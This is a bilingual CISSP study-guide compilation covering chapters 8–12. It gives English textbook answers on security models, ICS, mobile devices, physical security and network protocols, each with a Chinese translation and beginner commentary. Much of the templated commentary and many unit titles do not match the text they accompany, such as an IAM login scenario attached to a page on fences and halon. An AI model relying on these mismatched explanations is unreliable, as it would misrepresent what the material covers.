A closed system is one that is proprietary with no third-party product support. Open-source is a coding stance that allows others to view the source code of a program. Closedsource is an opposing coding stance that keeps source code confidential. 5. There are at least eight design principles listed in this chapter: objects and subjects, open and closed systems, secure defaults, fail securely, keep it simple, zero trust (trust but verify), privacy by design, and Secure Access Service Edge (SASE). Please compare your descriptions to the text in each section under the heading “Secure Design Principles.”

中文直译 / 整理

第8章:安全模型、设计与能力的原则 1. 安全模型包括状态机(确立了完美安全系统的概念)、信息流(控制数据 的移动)、非干扰(一个层级的主体行为不影响其他层级主体的系统状态或 行为)、取‑授权(控制主体间权利的传递)、访问控制矩阵(提供多个主体 对多个对象访问的视角)、Bell–LaPadula(保护机密性)、Biba(保护完 整性)、Clark–Wilson(保护完整性)以及Brewer和Nash(避免利益冲 突)。 2. 可信计算基(TCB)的主要组件包括用于强制执行安全策略的硬件和软 件元素(这些元素称为TCB)、区分并隔离TCB组件与非TCB组件的安全 边界,以及作为安全边界上访问控制设备的参考监视器。 3. Bell–LaPadula的两条主要规则是“禁止上读”简单规则和“禁止下写”星号 规则。 Biba的两条规则是“禁止下读”简单规则和“禁止上写”星号规则。 4. 开放系统是指具有已发布API的系统,允许第三方开发产品与其交互。 封 闭系统则是专有系统,不支持第三方产品。 开源是一种允许他人查看程序源 代码的编码立场。 闭源则是与之相反的编码立场,将源代码保密。

5. 本章列出了至少八项设计原则:对象和主体、开放和封闭系统、安全默认 值、安全失效、保持简洁、零信任(信任但验证)、设计隐私和安全访问服 务边缘(SASE)。 请将您的描述与“安全设计原则”标题下各节中的文本进 行比较。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 167 / PDF P1561

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Chapter 9: Security Vulnerabilities, Threats, and Countermeasures 1. An industrial control system (ICS) is a form of computer-management device that controls industrial processes and machines (aka operational technology). There are several forms of ICS, including programmable logic controllers (PLCs), distributed control systems (DCSs), and supervisory control and data acquisition (SCADA). PLC units are effectively single-purpose or focused-purpose digital computers. They are typically deployed for the management and automation of various industrial electromechanical operations.

DCS units are typically found in industrial process plants where the need to gather data and implement control over a large-scale environment from a single location is essential. A SCADA system can operate as a stand-alone device, can be networked together with other SCADA systems, or can be networked with traditional IT systems. A DCS focuses on processes and is state driven, whereas SCADA focuses on data gathering and is event driven. A DCS is used to control processes using a network of sensors, controllers, actuators, and operator terminals and is able to carry out advanced process control techniques.

DCS is more suited to operating on a limited scale, whereas SCADA is suitable for managing systems over large geographic areas. 2. The three pairs of aspects or features used to describe storage are primary versus secondary, volatile versus nonvolatile, and random versus sequential. 3. Some vulnerabilities found in distributed architecture include sensitive data found on desktops/terminals/laptops, lack of security understanding among users, greater risk of physical component theft, compromise of a client leading to the compromise of the whole network, greater risk from malware because of user-installed software and removable media, and data on clients less likely to be included in backups.

4. Examples of server-based technologies include large-scale parallel data systems, SMP, AMP, MPP, grid computing, peer-to-peer computing, ICS, PLC, DCS, SCADA, DCE, IoT, IIoT, microservices, SOA, IaC, SDV, virtualized systems (virtual software, virtual networking, SDN), SDx, SDS, SDDC, VDI, VMI, SDV, containerization, and serverless architecture.

中文直译 / 整理

第9章:安全漏洞、威胁与应对措施 1. 工业控制系统(ICS)是一种用于控制工业流程和机器的计算机管理设备 (又称运营技术)。 ICS有多种形式,包括可编程逻辑控制器(PLC)、分布 式控制系统(DCS)和监督控制与数据采集系统(SCADA)。 PLC单元本质 上是单一用途或专用数字计算机,通常用于管理和自动化各种工业机电操作。 DCS单元通常存在于工业过程工厂中,这些工厂需要从单一位置收集数据并 对大规模环境实施控制。 SCADA系统可以作为独立设备运行,可以与其他 SCADA系统联网,也可以与传统IT系统联网。 DCS侧重于流程,是状态驱动 的; 而SCADA侧重于数据收集,是事件驱动的。 DCS通过传感器、控制器、 执行器和操作员终端的网络来控制流程,并能够执行先进的过程控制技术。 DCS更适合在有限规模上运行,而SCADA则适用于管理大地理区域的系统。 2. 用于描述存储的三对方面或特征是主存储与辅存储、易失性与非易失性、 随机访问与顺序访问。

3. 分布式架构中发现的一些漏洞包括:桌面/终端/笔记本电脑上存在敏感数 据、用户缺乏安全意识、物理组件被盗的风险更高、客户端被攻破导致整个 网络被攻破、由于用户安装的软件和可移动介质,恶意软件风险更大,以及 客户端上的数据更不可能被纳入备份。 4. 基于服务器的技术示例包括大规模并行数据系统、SMP、AMP、MPP、 网格计算、点对点计算、ICS、PLC、DCS、SCADA、DCE、IoT、IIoT、 微服务、SOA、IaC、SDV、虚拟化系统(虚拟软件、虚拟网络、SDN)、 SDx、SDS、SDDC、VDI、VMI、SDV、容器化和无服务器。 架构。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 168 / PDF P1562

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

5. There were over 20 potential on-device security features mentioned in this chapter; any seven of the following would be correct: device authentication, full-device encryption, remote wiping, device lockout, screen locks, GPS and location services management, content management, application control, push notification management, thirdparty application store control, storage segmentation, asset tracking, removable storage, managing connection methods, deactivating unused features, rooting/jailbreaking, sideloading, custom firmware, carrier unlocking, firmware OTA updates, credential management, and text messaging security.

Note that MDM/UEM is not an on-device security feature but an external tool used to configure those features. There are four main mobile device deployment models: BYOD, CYOD, COPE, and COMS/COBO. VDI and VMI are alternative means to grant users access to company resources, but they are not mobile device deployment models.

There were over a dozen potential issues that should be addressed on a mobile device deployment policy mentioned in this chapter, and any seven of the following would be correct: data ownership, support ownership, patch and update management, security product management, forensics, privacy, architecture/infrastructure considerations, legal concerns, acceptable use policies, onboard cameras/video, recording microphone, tethering and hotspots, and contactless payment methods. 5.

中文直译 / 整理

本章提到了二十多种潜在的设备端安全功能; 以下任意七项均正确:设 备身份验证、全设备加密、远程擦除、设备锁定、屏幕锁定、GPS和位置 服务管理、内容 管理、应用程序控制、推送通知管理、第三方应用商店控制、存储分段、 资产追踪、可移动存储、连接方式管理、停用未使用的功能、越狱/破解、 侧载、自定义固件、运营商解锁、固件OTA更新、凭据管理以及短信安全。 请注意,MDM/UEM不是设备端安全功能,而是一种用于配置这些功能的 外部工具。 主要有四种移动设备部署模型:BYOD、CYOD、COPE 和 COMS/COBO。 VDI 和 VMI 是授予用户访问公司资源的替代方式,但它 们不属于移动设备部署模型。 本章提到了十余项应在移动设备部署策略中 解决的潜在问题,以下任意七项均正确:数据所有权、支持所有权、补丁 和更新管理、安全产品管理、取证、隐私、架构/基础设施考量、法律问题、 可接受使用政策、内置摄像头/视频、录音麦克风、网络共享和热点、以及 非接触式支付方式。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Owner 定规则,Custodian 执行保护。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
身份 身份是主体在系统中的标识。
学习单元 169 / PDF P1563

第 1563 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 10: Physical Security Requirements 1. A fence is an excellent perimeter safeguard that can help to deter casual trespassing. Moderately secure installations work when the fence is 6 to 8 feet tall and will typically be cyclone (also known as chain link) fencing with the upper surface twisted or barbed to deter casual climbers. More secure installations usually opt for fence heights over 8 feet and often include multiple strands of barbed or razor wire strung above the chain link fabric to further deter climbers. 2.

Halon is an effective fire suppression compound (it starves a fire of oxygen by disrupting the chemical reaction of combustion), but it degrades into toxic gases at 900 degrees Fahrenheit. Also, it is not environmentally friendly (it is an ozone-depleting substance). The 1989 Montreal Protocol initiated the termination of the manufacturing of ozone-depleting substances, which includes halon. In 1994, the EPA banned the manufacture of halon in the United States and banned importing halon into the country. However, according to the Montreal Protocol, you can obtain halon by contacting a halon recycling facility.

The EPA seeks to exhaust existing stocks of halon to take this substance out of circulation, there are still significant domestic stockpiles of halon. 3. Any time water is used to respond to fire, flame, or smoke, water damage becomes a serious concern, particularly when water is released in areas where electrical equipment is in use. Not only can computers and other electrical gear be damaged or destroyed by water, but many forms of storage media can also become damaged or unusable. Also, firefighters often use axes to break down doors or cut through walls to reach them as quickly as possible when seeking hot spots to extinguish.

This, too, poses the potential for physical damage to or destruction of devices and/or wiring that may also be in the vicinity. 4. A proximity device can be a passive device, a field-powered device, or a transponder. The proximity device is worn or held by the authorized bearer. When it passes near a proximity reader, the reader device is able to determine who the bearer is and whether they have authorized access. The passive proximity device has no active electronics; it is just a small magnet with specific properties (like antitheft devices commonly found in or on retail product packaging).

A passive device reflects or otherwise alters the electromagnetic (EM) field generated by the reader device. This alteration is detected by the reader device, which triggers the alarm,

中文直译 / 整理

第10章:物理安全要求 1. 围栏是一种优秀的周界防护措施,有助于阻止随意侵入。 中等安全级别的 设施通常采用6至8英尺高的围栏,一般为波纹钢(又称链式)围栏,其上部 表面经过扭曲或加装倒刺,以防止随意攀爬。 更高安全级别的设施通常选择 8英尺以上的围栏高度,并经常在链式网面上方加装多道倒刺或刀片铁丝, 以进一步阻止攀爬者。 2. 哈龙是一种有效的灭火剂(它通过破坏燃烧的化学反应来剥夺火源的氧气), 但在900华氏度时会分解成有毒气体。 此外,它对环境不友好(是一种消耗 臭氧层的物质)。 1989年的《蒙特利尔议定书》启动了停止生产消耗臭氧层 物质的进程,哈龙即在其中。 1994年,美国环保署禁止在美国境内生产哈龙, 并禁止将哈龙进口到该国。 然而,根据《蒙特利尔议定书》,您可以通过联 系哈龙回收设施获得哈龙。 美国环保署致力于耗尽现有的哈龙库存,使其退 出流通,但目前仍存在大量国内哈龙库存。 3. 任何时候用水应对火灾、火焰或烟雾,都会引发严重的水损问题,尤其是 在有电气设备运行的区域释放水时。 计算机和其他电气设备不仅可能因水而 受损或毁坏,许多存储介质也可能损坏或无法使用。

此外,消防员在寻找高 温点进行扑灭时,经常使用斧头砸门或切割墙壁以尽快到达现场。 这也可能 导致附近设备和/或线路遭受物理损坏或毁灭。 4. 临近设备可以是无源设备、场供电设备或应答器。 该临近设备由授权持有 人佩戴或手持。 当其靠近临近读取器时,读取器设备能够识别持有人身份及 其是否具有授权访问权限。 无源临近设备不含主动电子元件; 它只是一个具 有特定属性的小磁体(类似于零售商品包装中常见的防盗装置)。 无源设备 通过反射或以其他方式改变读取器设备产生的电磁(EM)场。 这种改变被读 取器设备检测到,从而触发警报,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1563 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
学习单元 170 / PDF P1564

第 1564 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

records a log event, or sends a notification. A field-powered proximity device has electronics that activate when the device enters the EM field that the reader generates. Such devices generate electricity from an EM field to power themselves (such as card readers that only require the access card to be waved within inches of the reader to unlock doors). This is effectively the concept of radio-frequency identification (RFID). A transponder proximity device is self-powered and transmits a signal received by the reader. This can occur consistently or only at the press of a button (like a garage door opener or car alarm key fob).

Such devices may have batteries, capacitors, or even be solar-powered.

中文直译 / 整理

记录日志事件或发送通知。 一种基于场的接近设备具有电子元件,当设备 进入读卡器产生的电磁场时会被激活。 此类设备通过电磁场产生电力以自 供电(例如,仅需将访问卡在读卡器数英寸范围内挥动即可解锁门的读卡 器)。 这实际上就是射频识别(RFID)的概念。 一种应答器接近设备是自 供电的,并向读卡器发送信号。 这种发送可以持续进行,也可以仅在按下 按钮时发生(如车库门开启器或汽车警报遥控钥匙)。 此类设备可能配备 电池、电容器,甚至可以是太阳能供电的。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1564 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 171 / PDF P1565

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Chapter 11: Secure Network Architecture and Components 1. Application (7), Presentation (6), Session (5), Transport (4), Network (3), Data Link (2), and Physical (1). 2.

Problems with cabling and their countermeasures include attenuation (use repeaters or don't violate distance recommendations), using the wrong category of cable (check the cable specifications against throughput requirements, and err on the side of caution), crosstalk (use shielded cables, place cables in separate conduits, or use cables of different twists per inch), interference (use cable shielding, use cables with higher twists per inch, or switch to fiber-optic cables), and eavesdropping (maintain physical security over all cable runs or switch to fiber-optic cables). 3.

Some of the frequency spectrum-use technologies are spread spectrum, Frequency Hopping Spread Spectrum (FHSS), Direct Sequence Spread Spectrum (DSSS), and Orthogonal Frequency-Division Multiplexing (OFDM). 4.

Methods used to secure 802.11 wireless networking include updating firmware; changing the default administrator password to something unique and complex; enabling WPA2 or WPA3 encryption; disabling the SSID broadcast; changing the SSID to something unique; changing the wireless MAC address; enabling MAC filtering; considering the use of static IPs or using DHCP with reservations; treating wireless as remote; separating WAPs from the LAN with firewalls; monitoring all wireless client activity with an IDS; deploying a wireless intrusion detection system (WIDS) and a wireless intrusion prevention system (WIPS); considering requiring wireless clients to connect with a VPN to gain LAN access; implementing a captive portal; and tracking/logging all wireless activities and events.

5. The applications and ports listed in this chapter you could have selected include: Telnet, TCP Port 23; File Transfer Protocol (FTP), TCP Ports 20 (Active Data Connection)/Ephemeral (Passive Data Connection) and 21 (Control Connection); Simple Mail Transfer Protocol (SMTP), TCP Port 25; SMTPS STARTTLS, TCP Port 587, SMTPS Implicit, TCP Port 465; Post Office Protocol (POP3), TCP Port 110; POPS, TCP Port 995; Internet Message Access Protocol (IMAP), TCP Port 143; IMAPS, TCP Port 993;

中文直译 / 整理

第11章:安全网络架构与组件 1. 应用层(7)、表示层(6)、会话层(5)、传输层(4)、网络层(3)、数 据链路层(2)和物理层(1)。 2. 电缆相关问题及其应对措施包括:衰减(使用中继器或不违反距离建议)、 使用错误类别的电缆(根据吞吐量要求检查电缆规格,并采取谨慎态度)、 串扰(使用屏蔽电缆、将电缆置于独立管道中或使用每英寸不同扭绞次数的 电缆)、干扰(使用电缆屏蔽、使用每英寸更高扭绞次数的电缆或切换到光 纤电缆)以及窃听(对所有电缆线路保持物理安全或切换到光纤电缆)。 3. 一些频谱使用技术包括扩频、跳频扩频(FHSS)、直接序列扩频( DSSS)和正交频分复用(OFDM)。 4. 用于保护802.11无线网络的方法包括:更新固件; 将默认管理员密码更改 为唯一且复杂的密码; 启用WPA2或WPA3加密; 禁用SSID广播; 将SSID 更改为唯一名称; 更改无线MAC地址; 启用MAC过滤; 考虑使用静态IP或 使用带保留的DHCP; 将无线网络视为远程网络; 使用防火墙将WAP与 LAN分离; 使用IDS监控所有无线客户端活动; 部署无线入侵检测系统( WIDS)和无线入侵防御系统(WIPS);

考虑要求无线客户端通过VPN连 接以访问LAN; 实施强制门户; 并跟踪/记录所有无线活动和事件。 5. 本章中您可能选择的应用程序和端口包括:Telnet,TCP端口23; 文件传输 协议(FTP),TCP端口20(主动数据连接)/临时端口(被动数据连接)和21 (控制连接); 简单邮件传输协议(SMTP),TCP端口25; SMTPS STARTTLS,TCP端口587,SMTPS隐式,TCP端口465; 邮局协议(POP3), TCP端口110; POPS,TCP端口995; 互联网消息访问协议(IMAP),TCP端 口143; IMAPS,TCP端口993;

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 172 / PDF P1566

第 1566 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Dynamic Host Configuration Protocol (DHCP), UDP Ports 67 and 68; Hypertext Transfer Protocol (HTTP), TCP Port 80; HTTPS with Transport Layer Security (TLS), TCP Port 443; Line Print Daemon (LPD), TCP Port 515; Network File System (NFS), TCP Port 2049; Simple Network Management Protocol (SNMP), UDP Port 161 (UDP Port 162 for Trap Messages); and Domain Name System (DNS), TCP/UDP 53.

中文直译 / 整理

动态主机配置协议(DHCP),UDP 端口 67 和 68; 超文本传输协议( HTTP),TCP 端口 80; 使用传输层安全协议(TLS)的 HTTPS,TCP 端口 443; 行打印守护进程(LPD),TCP 端口 515; 网络文件系统(NFS), TCP 端口 2049; 简单网络管理协议(SNMP),UDP 端口 161(UDP 端口 162 用于陷阱消息); 以及域名系统(DNS),TCP/UDP 端口 53。

小白解释

场景先行:你是公司的安全负责人,正在读第 1566 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1566 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 173 / PDF P1567

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Chapter 12: Secure Communications and Network Attacks 1. Transport mode links or VPNs are anchored or end at the individual hosts connected together. Let's use IPSec as an example. In transport mode, IPSec provides encryption protection for just the payload and leaves the original message header intact. This type of VPN is also known as a host-to-host VPN or an end-to-end encrypted VPN, since the communication remains encrypted while it is in transit between the connected hosts. Tunnel mode links or VPNs are anchored or end at VPN devices on the boundaries of the connected networks (or one remote device).

In tunnel mode, IPSec provides encryption protection for both the payload and message header by encapsulating the entire original LAN protocol packet and adding its own temporary IPSec header. Tunnel mode VPNs can be used to connect two networks across the Internet (aka site-to-site VPN) or to allow distant clients to connect into an office local area network (LAN) across the Internet (aka remote access VPN). 2. Network address translation (NAT) allows the identity of internal systems to be hidden from external entities. Often NAT is used to translate between RFC 1918 private IP addresses and leased public addresses.

NAT serves as a one-way firewall because it allows only inbound traffic that is a response to a previous internal query. NAT also allows a few leased public addresses to be used to grant internet connectivity to a larger number of internal systems. 3. Circuit switching is usually associated with physical connections. The link itself is physically established and then dismantled for the communication. Circuit switching offers known fixed delays, supports constant traffic, is connection oriented, is sensitive only to the loss of the connection rather than the communication, and is most often used for voice transmissions.

Packet switching is usually associated with logical connections because the link is just a logically defined path among possible paths. Within a packet-switching system, each system or link can be employed simultaneously by other circuits. Packet switching divides the communication into segments, and each segment traverses the circuit to the destination. Packet switching has variable delays because each segment could take a unique path, is usually employed for bursty traffic, is not physically connection oriented but often uses virtual

中文直译 / 整理

第12章:安全通信与网络攻击 1. 传输模式链接或VPN在连接的各个主机上锚定或终止。 我们以IPSec为例。 在传输模式下,IPSec仅对负载提供加密保护,而保留原始消息头不变。 这 种类型的VPN也称为主机到主机VPN或端到端加密VPN,因为通信在连接的 主机之间传输时始终保持加密状态。 隧道模式链接或VPN在连接网络边界 (或一个远程设备)上的VPN设备上锚定或终止。 在隧道模式下,IPSec通 过封装整个原始LAN协议数据包并添加其自己的临时IPSec头,为负载和消 息头提供加密保护。 隧道模式VPN可用于通过互联网连接两个网络(即站点 到站点VPN),或允许远程客户端通过互联网连接到办公室局域网(LAN) (即远程访问VPN)。 2. 网络地址转换(NAT)允许隐藏内部系统的身份,使其不被外部实体识 别。 NAT通常用于在RFC 1918私有IP地址和租赁的公有地址之间进行转换。 NAT充当单向防火墙,因为它仅允许作为对先前内部查询响应的入站流量。 NAT还允许使用少量租赁的公有地址,为更多的内部系统提供互联网连接。 3. 电路交换通常与物理连接相关联。 链路本身是物理建立的,通信结束后再 拆除。

电路交换提供已知的固定延迟,支持恒定流量,是面向连接的,仅对 连接丢失敏感而非通信本身,并且最常用于语音传输。 分组交换通常与逻辑 连接相关联,因为链路只是在可能路径中逻辑定义的路径。 在分组交换系统 中,每个系统或链路可被其他电路同时使用。 分组交换将通信划分为多个段, 每个段通过电路传输到目的地。 分组交换具有可变延迟,因为每个段可能采 取不同的路径,通常用于突发性流量,不是物理面向连接的,但常使用虚拟

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

